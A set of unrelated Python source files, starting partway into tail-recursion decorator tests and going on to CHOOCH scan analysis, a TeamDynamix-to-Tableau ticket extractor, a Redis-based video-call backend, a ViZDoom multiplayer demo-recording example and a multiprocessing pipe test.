assert 6 == my_func()
def test_recursion_beyond_python_limits():
RECURSION_LIMIT = sys.getrecursionlimit()
@tail_recursive
def my_func(calls=0):
if calls > RECURSION_LIMIT + 10:
return calls
raise RecursiveCall(my_func, calls + 1)
assert my_func() == RECURSION_LIMIT + 11
def test_recursion_nested():
def utility_func(a):
if a > 5:
return a
raise RecursiveCall(my_func, a + 2)
@tail_recursive
def my_func(a=0):
return utility_func(a)
assert 6 == my_func()
def test_recursion_multiple():
call_checkpoints = []
@tail_recursive
def a_func(a=0):
call_checkpoints.append(("a", a))
if a > 5:
return a
a = b_func(a + 1)
raise RecursiveCall(a_func, (a + 1) * 2)
@tail_recursive
def b_func(b=0):
call_checkpoints.append(("b", b))
if b > 5:
return b
b = a_func(b + 2)
raise RecursiveCall(b_func, b + 2)
assert a_func() == 42 # :)
assert call_checkpoints == [
("a", 0),
("b", 1),
("a", 3),
("b", 4),
("a", 6),
("b", 8),
("a", 18),
("b", 20),
("a", 42),
]
def test_recursion_raises_when_not_decorated():
call_checkpoints = []
@tail_recursive
def a_func(a=0):
call_checkpoints.append(("a", a))
if a > 5:
return a
a = b_func(a + 1)
raise RecursiveCall(a_func, (a + 1) * 2)
def b_func(b=0):
call_checkpoints.append(("b", b))
if b > 5:
return b
b = a_func(b + 2)
raise RecursiveCall(b_func, b + 2)
with pytest.raises(RecursionError):
assert a_func()
assert call_checkpoints == [("a", 0), ("b", 1), ("a", 3), ("b", 4), ("a", 6)]
|
chooch.py
|
import os
import re
import subprocess
import threading
import numpy
from mxdc.utils import converter
from mxdc.utils.log import get_module_logger
from mxdc import Engine
logger = get_module_logger(__name__)
class AutoChooch(Engine):
"""An event driven engines for performing analysis of MAD Scans with CHOOCH.
"""
def __init__(self):
super().__init__()
self.results = {}
def configure(self, config, data, uname=None):
"""
Prepare the run chooch
:param config: a dictionary containing the MAD-Scan configuration
:param data: a numpy array containing the raw data
:param uname: optional username
:return:
"""
self.config = config
self.data = numpy.dstack([data['energy'] * 1000, data['normfluor']])[0]
self.inp_file = os.path.join(self.config['directory'], "{}.dat".format(self.config['name']))
self.esf_file = os.path.join(self.config['directory'], "{}.esf".format(self.config['name']))
self.out_file = os.path.join(self.config['directory'], "{}.out".format(self.config['name']))
def start(self):
"""Start the analysis asynchronously. Use signals to determine completion/failure."""
worker = threading.Thread(target=self.run)
worker.setName('AutoChooch')
worker.setDaemon(True)
worker.start()
def run(self):
self.results = {}
element, edge = self.config['edge'].split('-')
self.prepare_input()
try:
output = subprocess.check_output([
'chooch', '-e', element, '-a', edge, self.inp_file, '-o', self.esf_file
], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
# Chooch sometimes exits with non-zero
logger.error(e.output)
else:
self.read_results(output.decode('utf-8'))
finally:
#os.remove(self.inp_file)
self.emit('done', None)
return self.results
def prepare_input(self):
with open(self.inp_file, 'w') as handle:
handle.write('#CHOOCH INPUT DATA\n%d\n' % len(self.data[:,0]))
numpy.savetxt(handle, self.data, fmt='%0.2f')
def read_results(self, output):
try:
data = numpy.genfromtxt(
self.esf_file, comments="#", dtype={'names': ['energy', 'fpp', 'fp'], 'formats': [float, float, float]}
)
data['energy'] *= 1e-3 # convert back to keV
self.results['esf'] = data
except IOError as e:
logger.error(e)
self.emit('error', 'CHOOH Failed.')
return
# extract MAD wavelengths from output
r = re.compile(
r'\|\s+(?P<label>[^|]+)\s+\|\s+(?P<wavelength>(?P<energy>\d+\.\d+))\s+'
r'\|\s+(?P<fpp>-?\d+\.\d+)\s+\|\s+(?P<fp>-?\d+\.\d+)\s+\|'
)
energies = [m.groupdict() for m in r.finditer(output)]
converters = {
'energy': lambda x: float(x)*1e-3,
'wavelength': lambda x: converter.energy_to_wavelength(float(x)*1e-3),
'fpp': float,
'fp': float,
'label': lambda x: x
}
choices = [
{key: converters[key](value) for key, value in list(dataset.items())}
for dataset in energies
]
if choices:
# select remote energy, maximize f" x delta-f'
infl = choices[1]
sel = self.results['esf']['energy'] < (infl['energy'] + 0.1)
sel &= self.results['esf']['energy'] > (infl['energy'] + 0.05)
fpp = self.results['esf']['fpp'][sel]
fp = self.results['esf']['fp'][sel]
energy = self.results['esf']['energy'][sel]
opt = fpp * (fp - infl['fp'])
opt_i = opt.argmax()
choices.append({
'label': 'remo', 'energy': energy[opt_i], 'fpp': fpp[opt_i], 'fp': fp[opt_i],
'wavelength': converter.energy_to_wavelength(energy[opt_i])
})
# new_output = "Selected Energies for 3-Wavelength MAD data \n"
# new_output +="and corresponding anomalous scattering factors.\n"
# new_output += "+------+------------+----------+--------+--------+\n"
# new_output += "| | wavelength | energy | f'' | f' |\n"
# for choice in choices:
# new_output += '| {label:4s} | {wavelength:10.5f} | {energy:8.5f} | {fpp:6.2f} | {fp:6.2f} |\n'.format(
# **choice
# )
# new_output += "+------+------------+----------+--------+--------+\n"
# with open(self.out_file, 'w') as handle:
# handle.write(new_output)
self.results['choices'] = choices
|
dailyBuilder.py
|
#!/usr/bin/python
# This Python file uses the following encoding: utf-8
#__ __ _ _ _ _
#\ \ / /__| | ___ ___ _ __ ___ ___ | |_ ___ | |_| |__ ___
# \ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \ | __/ _ \ | __| '_ \ / _ \
# \ V V / __/ | (_| (_) | | | | | | __/ | || (_) | | |_| | | | __/
# \_/\_/ \___|_|\___\___/|_| |_| |_|\___| \__\___/ \__|_| |_|\___|
#
# ____ _ _ ____ _ _ _
#| _ \ __ _(_) |_ _ | __ ) _ _(_) | __| | ___ _ __
#| | | |/ _` | | | | | | | _ \| | | | | |/ _` |/ _ \ '__|
#| |_| | (_| | | | |_| | | |_) | |_| | | | (_| | __/ |
#|____/ \__,_|_|_|\__, | |____/ \__,_|_|_|\__,_|\___|_|
# |___/
# Written by Micah Cooper
# This code extracts data from TeamDynamix and places it into a local database for advanced manipulation.
# 1. Get basic info for all tickets in range
#
# ┌─────────────────────┐ ┌───────────────────┐
# │ │◀────POST /api/tickets/search────┤ │
# │ │ │ send_request │ ┌──────────┐
# │ TeamDynamix │────────ID, CreationDate────────▶│ │─upsert──▶│ sqlite │
# │ │ │ │ └──────────┘
# │ │ └───────────────────┘
# └─────────────────────┘
#
#
# 2. Get expanded info for each ticket
#
#
# ┌─────────────────────┐ ┌───────────────────┐
# │ │◀───GET /api/tickets/{ticketid}──┤ │
# │ │ │ getticket │ ┌──────────┐
# │ TeamDynamix │───────────all stuffs───────────▶│ │─upsert──▶│ sqlite │
# │ │ │ │ └──────────┘
# │ │ └───────────────────┘
# └─────────────────────┘
#
#
# 3. Loop through tickets to build how many
# open each day
#
#
# ┌─────────────────────┐ ┌───────────────────┐ count
# │ │◀─────────────│ dailyextract() │───────(int)───────────▶
# │ │ └───────────────────┘
# │ SQLite │──┐
# │ │ │
# │ │ │
# └─────────────────────┘ │
# ▲ │
# │ │
# └─────────────┘
# 4. (optional) Upload subset of summary results into webservice for cross-comparison
earliestdate = '2015-07-01 00:00:00'
# coding: utf-8
import json
import yaml
import os
import shutil
import errno
import sqlite3
# import urllib
# import urllib2
import requests
import time
from datetime import datetime
from datetime import timedelta
#import dateutil
from dateutil import parser
#from tableausdk import *
#tfrom tableausdk.Extract import *
import pytz
#from tzlocal import get_localzone
from tableausdk import *
from tableausdk.Extract import *
#import msgpack
#from io import BytesIO
import readchar
#import xml.etree.cElementTree as ET
import sys, traceback
import copy
from threading import Thread
import getpass
# if zlib, get fancier compression
import zipfile
try:
import zlib
compression = zipfile.ZIP_DEFLATED
except:
compression = zipfile.ZIP_STORED
# Globals
domain = ""
def updatelabels(domain):
twbedit('best.edu', domain)
datestr = datetime.now().strftime("%Y-%m-%d %H:%M")
twbedit('xx/xx/xxxx', datestr)
def twbedit(textToSearch, textToReplace):
#print "searching for " + textToSearch + "\n"
# from http://stackoverflow.com/questions/17140886/how-to-search-and-replace-text-in-a-file-using-python
filein = 'dist/TDAnalysis.twb'
fileout = 'dist/TDAnalysis.twb'
f = open(filein,'r')
filedata = f.read()
f.close()
newdata = filedata.replace(textToSearch,textToReplace)
f = open(fileout,'w')
f.write(newdata)
f.close()
def getToken(username, password):
# Get Bearer Token
# POST https://teamdynamix.com/TDWebApi/api/auth
global domain
"""
:rtype: object
"""
try:
response = requests.post(
url="https://app.teamdynamix.com/TDWebApi/api/auth",
headers={
"Content-Type": "application/json",
},
data=json.dumps({
"username": username,
"password": password
})
)
#print('Bearer HTTP Status Code: {status_code}'.format(
# status_code=response.status_code))
if 200 != response.status_code:
print('Bearer HTTP Status Code: {status_code}'.format(
status_code=response.status_code))
return None
#print('Response HTTP Response Body: {content}'.format(
# content=response.content))
domain = username.split("@")[-1]
return response.content
except requests.exceptions.RequestException:
print('HTTP Request failed')
conn.commit()
conn.close()
def send_request(token, lastStart):
# Get Recent Tickets
# POST https://teamdynamix.com/TDWebApi/api/tickets/search
"""
:rtype: object
"""
querystart = lastStart.strftime("%Y-%m-%d %H:%M:%S")
print "Downloading data from TeamDynamix.\nQuery period starts {start}".format(start=querystart)
try:
#print "Bearer {token}".format(token=token)
response = requests.post(
url="https://teamdynamix.com/TDWebApi/api/tickets/search",
headers={
"Authorization": "Bearer {token}".format(token=token),
"Content-Type": "application/json",
},
data=json.dumps({
"UpdatedDateFrom": querystart,
"MaxResults": 0
})
)
print('Connected and beginning work'.format(
status_code=response.status_code))
if 200 != response.status_code:
print('Response HTTP Status Code: {status_code}'.format(
status_code=response.status_code))
return None
# print('Response HTTP Response Body: {content}'.format(
# content=response.content))
data = response.json()
return data
except requests.exceptions.RequestException:
print('HTTP Request failed')
conn.commit()
conn.close()
def upsert(c, row):
"""
:type row: object
"""
rec = [row['AccountName'], row['TypeCategoryName'], row['TypeName'], row['SlaName'], row['IsSlaResolveByViolated'],
row['CreatedDate'], row['ResponsibleGroupName'], row['ServiceName'], row['ServiceCategoryName'],
row['CompletedDate'], row['ID'], row['DaysOld'], row['ResolveByDate']]
c.execute("INSERT OR REPLACE INTO tickets (AccountName, TypeCategoryName, TypeName, SlaName, IsSlaResolveByViolated, CreatedDate, ResponsibleGroupName, ServiceName, ServiceCategoryName, CompletedDate, ID, DaysOld, ResolveByDate) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)", rec)
def getData(token, c, lastStart):
tdson = send_request(token, lastStart)
if tdson is None:
return False
else:
print "Processing tickets"
for ticket in tdson:
#print ticket
upsert(c, ticket)
#print ticket['ID']
return True
def getlast(c):
c.execute("SELECT MAX(trackdate) FROM tdbatch")
data = c.fetchone()[0]
earlystring = 'SELECT "' + earliestdate + '"'
#print earlystring
c.execute(earlystring)
tdate = parser.parse(c.fetchone()[0])
if data:
greatestdate = parser.parse(data)
lastdate = max(greatestdate, tdate)
else:
lastdate = tdate
#lastdate = lastdate - timedelta(minutes=2)
return lastdate
def checkconfig(config):
if config is None:
return False
if 'username' not in config:
return False
elif 'password' not in config:
return False
elif 'school' not in config:
return False
else:
return True
def doconfig(config):
u = None
p = None
s = None
if config is None:
config = dict()
if 'username' not in config:
print "Enter your TeamDynamix username (not SSO): ",
u = raw_input()
if u is None:
sys.exit(0)
else:
u = config['username']
if 'password' not in config:
#print "Enter your TeamDynamix password: ",
p = getpass.getpass('Enter your TeamDynamix password (will not display – not SSO): ')
#p = raw_input()
if p is None:
sys.exit(0)
else:
p = config['password']
if 'school' not in config:
print "Enter your school name: ",
s = raw_input()
else:
s = config['school']
token = getToken(u,p)
if token is None:
doconfig(None)
else:
config['username'] = u
config['password'] = p
config['school'] = s
with open ('data/config.yml', 'w') as outfile:
outfile.write(yaml.dump(config, default_flow_style=False))
return token
def basicextract(cursor):
print "Building Tableau Extract"
os.chdir("data")
basicfile = 'alltickets.tde'
# Tableau SDK does not allow reading an extract, so updating an existing
# one is moot – so we delete it first
try:
os.remove(basicfile)
except OSError:
pass
# then build a new one
new_extract = Extract(basicfile)
# build our schema
table_definition = TableDefinition()
table_definition.addColumn('ID', Type.INTEGER)
table_definition.addColumn('AccountName', Type.UNICODE_STRING)
table_definition.addColumn('TypeCategoryName', Type.UNICODE_STRING)
table_definition.addColumn('TypeName', Type.UNICODE_STRING)
table_definition.addColumn('LocalCreatedDate', Type.DATETIME)
table_definition.addColumn('ServiceName', Type.UNICODE_STRING)
table_definition.addColumn('ServiceCategoryName', Type.UNICODE_STRING)
table_definition.addColumn('LocalCompletedDate', Type.DATETIME)
table_definition.addColumn('ResolveByDate', Type.DATETIME)
table_definition.addColumn('DaysOld', Type.INTEGER)
# Table always needs to be named Extract *shrug*
new_table = new_extract.addTable('Extract', table_definition)
# Query our db
cursor.execute("SELECT ID, AccountName, TypeCategoryName, TypeName, datetime(CreatedDate, 'localtime') AS LocalCreatedDate, ServiceName, ServiceCategoryName, datetime(CompletedDate, 'localtime') AS LocalCompletedDate, DaysOld, ResolveByDate FROM tickets")
for ID, AccountName, TypeCategoryName, TypeName, LocalCreatedDate, ServiceName, ServiceCategoryName, LocalCompletedDate, DaysOld, ResolveByDate in cursor.fetchall():
#print ID, AccountName
# Create new row
new_row = Row(table_definition) # Pass the table definition to the constructor
# Set column values. The first parameter is the column number (its
# ordinal position) The second parameter (or second and subsequent paramaters) is
# the value to set the column to.
new_row.setInteger(0, ID)
new_row.setString(1, AccountName)
new_row.setString(2, TypeCategoryName)
new_row.setString(3, TypeName)
d = parser.parse(LocalCreatedDate)
new_row.setDateTime(4, d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond/100 )
new_row.setString(5, ServiceName)
new_row.setString(6, ServiceCategoryName)
d = parser.parse(LocalCompletedDate)
new_row.setDateTime(7, d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond/100 )
d = parser.parse(ResolveByDate)
new_row.setDateTime(8, d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond/100 )
new_row.setInteger(9, DaysOld)
new_table.insert(new_row)
# Close the extract in order to save the .tde file and clean up resources
new_extract.close()
os.chdir(bindir)
def dailyextract(cursor):
print "Building Tableau Daily Extract"
os.chdir('data')
dailyfile = 'dailyopen.tde'
# Tableau SDK does not all reading an extract, so updating an existing
# one is moot – so we delete it first
try:
os.remove(dailyfile)
except OSError:
pass
# then build a new one
new_extract = Extract(dailyfile)
# build our schema
table_definition = TableDefinition()
table_definition.addColumn('ID', Type.INTEGER)
table_definition.addColumn('AccountName', Type.UNICODE_STRING)
table_definition.addColumn('TypeCategoryName', Type.UNICODE_STRING)
table_definition.addColumn('TypeName', Type.UNICODE_STRING)
table_definition.addColumn('LocalCreatedDate', Type.DATETIME)
table_definition.addColumn('ServiceName', Type.UNICODE_STRING)
table_definition.addColumn('ServiceCategoryName', Type.UNICODE_STRING)
table_definition.addColumn('LocalCompletedDate', Type.DATETIME)
table_definition.addColumn('DisplayDate', Type.DATETIME)
# Table always needs to be named Extract *shrug*
new_table = new_extract.addTable('Extract', table_definition)
# build a daily loop starting with earliest date in the db
minraw = cursor.execute('SELECT date(MIN(CreatedDate), "localtime") FROM tickets').fetchone()[0]
if minraw:
mindate = parser.parse(minraw)
else:
mindate = parser.parse(earliestdate)
maxraw = cursor.execute('SELECT date(MAX(CreatedDate), "localtime") FROM tickets').fetchone()[0]
if maxraw:
maxdate = parser.parse(maxraw)
else:
maxdate = datetime.now()
loopdate = mindate
while loopdate < maxdate:
rec = [loopdate, loopdate]
cursor.execute("SELECT ID, AccountName, TypeCategoryName, TypeName, datetime(CreatedDate, 'localtime') AS LocalCreatedDate, ServiceName, ServiceCategoryName, datetime(CompletedDate, 'localtime') AS LocalCompletedDate FROM tickets WHERE datetime(CreatedDate, 'localtime') < ? AND (datetime(CompletedDate, 'localtime') > ? OR CompletedDate IS NULL)", rec)
#print "daily processing date: " + str(loopdate)
for ID, AccountName, TypeCategoryName, TypeName, LocalCreatedDate, ServiceName, ServiceCategoryName, LocalCompletedDate in cursor.fetchall():
# print ID, AccountName
# Create new row
new_row = Row(table_definition) # Pass the table definition to the constructor
# Set column values. The first parameter is the column number (its
# ordinal position) The second parameter (or second and subsequent paramaters) is
# the value to set the column to.
new_row.setInteger(0, ID)
new_row.setString(1, AccountName)
new_row.setString(2, TypeCategoryName)
new_row.setString(3, TypeName)
d = parser.parse(LocalCreatedDate)
#if( CreatedDate.find(".") != -1) :
# d = datetime.strptime(CreatedDate, "%Y-%m-%d %H:%M:%S.%f")
#else :
# d = datetime.strptime(CreatedDate, "%Y-%m-%d %H:%M:%S")
new_row.setDateTime(4, d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond/100 )
new_row.setString(5, ServiceName)
new_row.setString(6, ServiceCategoryName)
d = parser.parse(LocalCompletedDate)
new_row.setDateTime(7, d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond/100 )
d = loopdate
new_row.setDateTime(8, d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond/100 )
new_table.insert(new_row)
loopdate = loopdate + timedelta(days=1)
# Close the extract in order to save the .tde file and clean up resources
new_extract.close()
os.chdir(bindir)
def displaychoices(cats):
i = 0
print "\nPress q when done selecting"
for cat in cats:
if cat[1]:
print u"\u2611" + " " + str(i) + ". " + cat[0]
else:
print u"\u2610" + " " + str(i) + ". " + cat[0]
i += 1
def uploadquiz(cats, unit, desc):
startstr = "| Which of these Categories refers to "
fullstr = startstr + unit + " (" + desc + ")? |"
strlen = len(fullstr)
secstr = "Press q when done selecting"
secstrlen = len(secstr) + 4
buflen = int((strlen - secstrlen) / 2)
flsecstr = "| " + " "*buflen + secstr + " "*(strlen-(secstrlen+buflen)) + " |"
headfoot = "-" * strlen
print "\n" + headfoot
print fullstr
print flsecstr
print headfoot
ansarray = []
ans = ""
displaychoices(cats)
numchoices = len(cats)
while True:
ans = readchar.readkey()
if ans == 'q':
break
elif ans.isdigit():
ansint = int(ans)
if ansint < numchoices:
cats[ansint][1] = not cats[ansint][1]
displaychoices(cats)
#elif ans in 'q':
# break
# elif ans == '0x03'
# sys.exit(0)
#else:
# print ans
# break
#print "......"
#print u"\u2611"
#print ans
#return int(ans)
def uploadsubset(conn):
print "\n"
print "Hi!\n"
print "** Would you like to opt in to sharing some aggregate data? (Totally FERPA safe – just basic stats!) **\n"
while True:
helpful = readchar.readkey()
if helpful == 'y':
print "\nYay!\n"
break
if helpful == 'n':
print "\nOkay :'(\n"
return
# first we get all the type categories
catsql = 'SELECT DISTINCT TypeCategoryName FROM tickets'
c.execute(catsql)
catret = c.fetchall()
# build a pristine list with everything set to false
cats = []
for cat in catret:
cats.append([cat[0], False])
# Then copy the list for each grouping
# first, incidents
inccats = copy.deepcopy(cats)
uploadquiz(inccats, "Incidents", "Worked yesterday, but not today")
# then, SRs
srcats = copy.deepcopy(cats)
uploadquiz(srcats, "Service Requests", "Stuff you want, but it's not our fault")
# then, Changes
ccats = copy.deepcopy(cats)
uploadquiz(ccats, "Changes", "Official Changes")
#print cats[ans]
#icat = cats[uploadquiz(cats, "Incidents", "broken things")]
#print icat
def doextracts(threadname, threadno):
if threadname:
None
tconn = sqlite3.connect('data/td2.db')
tc = tconn.cursor()
dailyextract(tc)
tconn.commit()
tconn.close()
def make_sure_path_exists(path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def zipfolder(foldername, target_dir):
zipobj = zipfile.ZipFile(foldername + '.twbx', 'w', zipfile.ZIP_DEFLATED)
rootlen = len(target_dir) + 1
for base, dirs, files in os.walk(target_dir):
for file in files:
fn = os.path.join(base, file)
zipobj.write(fn, fn[rootlen:])
def makemagic():
with zipfile.ZipFile('dist/TDAnalysis.twbx', "r") as z:
z.extractall("data/pytmp")
z.close()
try:
os.remove("data/pytmp/Data/data/alltickets.tde")
except OSError:
pass
try:
os.remove("data/pytmp/Data/data/dailyopen.tde")
except OSError:
pass
#try:
os.rename("dist/TDAnalysis.twb", "data/pytmp/TDAnalysis.twb")
os.rename("data/dailyopen.tde", "data/pytmp/Data/data/dailyopen.tde")
os.rename("data/alltickets.tde", "data/pytmp/Data/data/alltickets.tde")
#except OSError:
# print "Serious OS error. Exiting\n"
# sys.exit(1)
try:
os.remove("TDAnalysis.twbx")
except OSError:
pass
zipfolder('TDAnalysis', 'data/pytmp') #insert your variables here
sys.exit()
def prepdist():
# Grab the latest version of TDAnalysis.twb from GitHub
make_sure_path_exists('dist')
twbxtemplate = 'dist/TDAnalysis.twbx'
try:
print "Grabbing latest template from GitHub"
r = requests.get('https://raw.githubusercontent.com/coopermj/TeamDynamixFun/master/dist/TDAnalysis.twbx')
if 200 != r.status_code:
print('Could not download template – HTTP Status Code: {status_code}'.format(status_code=response.status_code))
sys.exit(1)
f = open(twbxtemplate, 'w')
f.write(r.content)
f.close()
r.close()
except:
print('HTTP Request failed')
sys.exit(1)
try:
with zipfile.ZipFile(twbxtemplate, 'r') as z:
z.extractall('data/template')
except:
print ('extraction failed')
# copy twb for manipulation
srcfile = 'data/template/TDAnalysis.twb'
shutil.copy(srcfile,'dist/TDAnalysis.twb')
# _ __ __ _ _ _ _
#/ | | \/ | __ _(_)_ __ ___ ___ __| | ___ ___| |_ __ _ _ __| |_ ___
#| | | |\/| |/ _` | | '_ \ / __/ _ \ / _` |/ _ \ / __| __/ _` | '__| __/ __|
#| |_ | | | | (_| | | | | | | (_| (_) | (_| | __/ \__ \ || (_| | | | |_\__ \
#|_(_) |_| |_|\__,_|_|_| |_| \___\___/ \__,_|\___| |___/\__\__,_|_| \__|___/
#
# _
#| |__ ___ _ __ ___
#| '_ \ / _ \ '__/ _ \
#| | | | __/ | | __/
#|_| |_|\___|_| \___|
#
bindir = os.getcwd()
#os.chdir("..")
#basedir = os.getcwd()
#confdir = bindir + '/config'
#tdedir = basedir + '/tde_repo'
# Initial setup operations
make_sure_path_exists('data')
conffile = 'data/config.yml'
try:
config = yaml.safe_load(open(conffile))
except:
config = None
token = doconfig(config)
conn = sqlite3.connect('data/td2.db')
prepdist()
c = conn.cursor()
c.execute('PRAGMA journal_mode=OFF;') # bump da speed
conn.commit()
# Create tables if they do not exist
c.execute('''CREATE TABLE IF NOT EXISTS tdbatch
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
trackdate INTEGER
)''')
c.execute('''CREATE TABLE IF NOT EXISTS tdruns
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
proc TEXT,
runStart INT,
runEnd INT
)''')
c.execute('''CREATE TABLE IF NOT EXISTS tickets
(ID INTEGER PRIMARY KEY,
AccountName TEXT,
TypeCategoryName TEXT,
TypeName TEXT,
SlaName TEXT,
IsSlaResolveByViolated INTEGER,
CreatedDate INT,
ResolveByDate INT,
ResponsibleGroupName TEXT,
ServiceName TEXT,
ServiceCategoryName TEXT,
CompletedDate INT,
DaysOld INT)''')
# c.execute('SELECT MAX(runStart) FROM tdruns WHERE runEnd IS NOT NULL')
now = datetime.now()
rec = ['getTickets', now]
c.execute('INSERT INTO tdruns(proc, runStart) VALUES(?,?)', rec)
conn.commit()
trackdate = getlast(c)
wegood = getData(token, c, trackdate)
#wegood = True # for debugging
if wegood is False:
sys.exit(1)
else:
rec = [trackdate]
c.execute('INSERT INTO tdbatch (trackdate) VALUES(?)', rec)
conn.commit()
rec = [now]
c.execute('INSERT INTO tdbatch (trackdate) VALUES(?)', rec)
then = datetime.now()
rec = [then, now]
c.execute('UPDATE tdruns SET runEnd = ? WHERE runStart = ?', rec)
conn.commit()
# Due to the vagaries of using update dates instead of created dates,
# we get old tickets in the flow that we need to terminate
delstring = 'DELETE FROM tickets WHERE CreatedDate < "' + earliestdate + '"'
c.execute(delstring)
conn.commit()
updatelabels(domain)
#thread.start_new_thread(doextracts, ("doextract",1))
#threads = []
basicextract(c)
conn.commit()
#t = Thread(target=doextracts, args=("doextract",0))
#t.start()
#t.join()
dailyextract(c)
conn.commit()
c.close()
#uploadsubset(c)
# do the file switcharoo
makemagic()
conn.close()
|
local_backend.py
|
import socket
import time
import threading
import redis
from database import *
import json
from call_maker import *
from call_listener import *
import multiprocessing
'''
The backend_server runs in a separate process, and it communicates with:
- Electron: Using a socket
- Python processes: Using pipes
The Python processes are mainly:
- call maker
- call listener
- video server
- audio server
- video receiver
- audio receiver
'''
def start_call_maker(ip, r):
main_thread = InitiateCallThread(1, "call maker", 1, ip, r)
main_thread.start()
main_thread.join()
print("Ended the call making process.")
def start_call_listener(r):
main_thread = CallListeningThread(1, "call listener", 1, r)
main_thread.start()
main_thread.join()
print("Ended the call listening process.")
def online_list_listener(r: redis.Redis):
print("Online list listener started.")
while True:
status = r.get("status").decode("utf-8")
if status == 'quit':
r.set("online_list", "[]")
break
if status != 'home':
time.sleep(0.5)
continue
online_list = get_online_users()
res = []
count = 0
for i in online_list:
entry = {
'id': count,
'name': i['name'],
'ip': i['ip']
}
res.append(entry)
count += 1
# print(res)
r.set("online_list", json.dumps(res))
time.sleep(0.2)
def backend_server_redis():
r = redis.Redis()
r.set("status", "waiting_username")
r.set("use_video", "TRUE")
r.set("use_audio", "TRUE")
r.set("show_video", "TRUE")
r.set("show_audio", "TRUE")
r.set("online_list", "[]")
r.set("incoming_status", "waiting_username")
r.set("outgoing_status", "waiting_username")
r.set("username", "")
r.set("correspondent_id", "")
r.set("correspondent_ip", "")
r.set("correspondent_name", "")
r.set("current_video_frame", "")
r.set("python_status", "ON")
r.set("own_webcam", "")
r.set("other_webcam", "")
current_username = ""
online_list_listener_thread = threading.Thread(target=online_list_listener, args=(r,))
while 1:
# Check status first
status = r.get("status").decode('utf-8')
if status == "waiting_username":
# Check username
username = r.get("username").decode('utf-8')
if username != current_username:
print(f'Username in Python: {username}')
signup(username)
go_online(username, get_my_private_ip())
current_username = username
# todo start the call listener here
call_listener_process = multiprocessing.Process(target=start_call_listener, args=(r,))
call_listener_process.start()
print("Started the call listener process.")
if not online_list_listener_thread.is_alive():
online_list_listener_thread.start()
r.set("status", "home")
elif status == "home":
continue
# todo check if I need to do anything here (maybe reset vars after a call)
elif status == "incoming":
ip = r.get("correspondent_ip")
if ip != "":
name = get_username_by_ip(ip)
r.set("correspondent_name", name)
incoming_status = r.get("incoming_status")
if incoming_status == "declined":
# We should restart the call listener because it quits when we decline.
call_listener_process = multiprocessing.Process(target=start_call_listener, args=(r,))
call_listener_process.start()
print("Started the call listener process.")
r.set("status", "home")
elif incoming_status == "accepted":
r.set("status", "call")
elif status == "initiate_call":
i = int(r.get("correspondent_id").decode('utf-8'))
online_users = list(get_online_users())
ip = online_users[i]['ip']
name = online_users[i]['name']
r.set("correspondent_ip", ip)
r.set("correspondent_name", name)
# todo start the call making thread
call_maker_process = multiprocessing.Process(target=start_call_maker, args=(ip, r,))
go_offline(current_username)
call_maker_process.start()
print("Started the call maker process.")
r.set("status", "calling")
r.set("calling_status", "ringing")
elif status == "calling":
calling_status = r.get("calling_status").decode("utf-8")
if calling_status == "ringing":
continue
elif calling_status in ["line_busy", "cancelled", "declined", "error"]:
go_online(current_username, get_my_private_ip())
r.set("status", "home")
elif calling_status == "accepted":
r.set("status", 'call')
else:
print("ERROR: Unexpected calling status.")
# Check for making a call
make_call = r.get("make_call")
if make_call:
r.get("correspondent_id")
# todo start the call making thread (will check for use_video and use_audio)
# todo check incoming call (maybe in the call listening thread)
# todo
status = r.get("status").decode('utf-8')
# print(status)
if status == 'quit':
go_offline(current_username)
kill_listener()
break
# Sleep between polls
time.sleep(0.1)
|
record_multiplayer.py
|
#!/usr/bin/python3
#####################################################################
# This script presents how to use Doom's native demo mechanism to
# record multiplayer game and replay it with perfect accuracy.
#####################################################################
# WARNING:
# Due to the bug in build-in bots recording game with bots will result in the desynchronization of the recording.
from multiprocessing import Process
import os
from random import choice
import vizdoom as vzd
def player1():
game = vzd.DoomGame()
game.load_config(os.path.join(vzd.scenarios_path, "multi_duel.cfg"))
game.add_game_args("-host 2 -deathmatch +timelimit 1 +sv_spawnfarthest 1 ")
game.add_game_args("+name Player1 +colorset 0")
# Unfortunately multiplayer game cannot be recorded using new_episode() method, use this command instead.
game.add_game_args("-record multi_rec.lmp")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Game finished!")
print("Player1 frags:", game.get_game_variable(vzd.GameVariable.FRAGCOUNT))
game.close()
def player2():
game = DoomGame()
game.load_config('../../scenarios/multi_duel.cfg')
game.set_window_visible(False)
game.add_game_args("-join 127.0.0.1")
game.add_game_args("+name Player2 +colorset 3")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Player2 frags:", game.get_game_variable(vzd.GameVariable.FRAGCOUNT))
game.close()
def replay_as_player2():
game = DoomGame()
game.load_config('../config/multi_duel.cfg')
# At this moment ViZDoom will crash if there is no starting point - this is workaround for multiplayer map.
game.add_game_args("-host 1 -deathmatch")
game.init()
# Replays episode recorded by player 1 from perspective of player2.
game.replay_episode("multi_rec.lmp", 2)
while not game.is_episode_finished():
game.advance_action()
print("Game finished!")
print("Player1 frags:", game.get_game_variable(vzd.GameVariable.PLAYER1_FRAGCOUNT))
print("Player2 frags:", game.get_game_variable(vzd.GameVariable.PLAYER2_FRAGCOUNT))
game.close()
# Delete multi_rec.lmp
os.remove("multi_rec.lmp")
if __name__ == '__main__':
print("\nRECORDING")
print("************************\n")
p1 = Process(target=player1)
p1.start()
player2()
print("\nREPLAY")
print("************************\n")
replay_as_player2()
|
test_pipe.py
|
import multiprocessing as mp
def prod(pipe):
out_conn, _ = pipe
for x in range(10):
out_conn.send(x)
out_conn.close()
def square(pipe1, pipe2):
close, in_conn = pipe1
close.close()
out_conn, _ = pipe2
try:
while True:
x = in_conn.recv()
out_conn.send(x * x)
except EOFError:
out_conn.close()
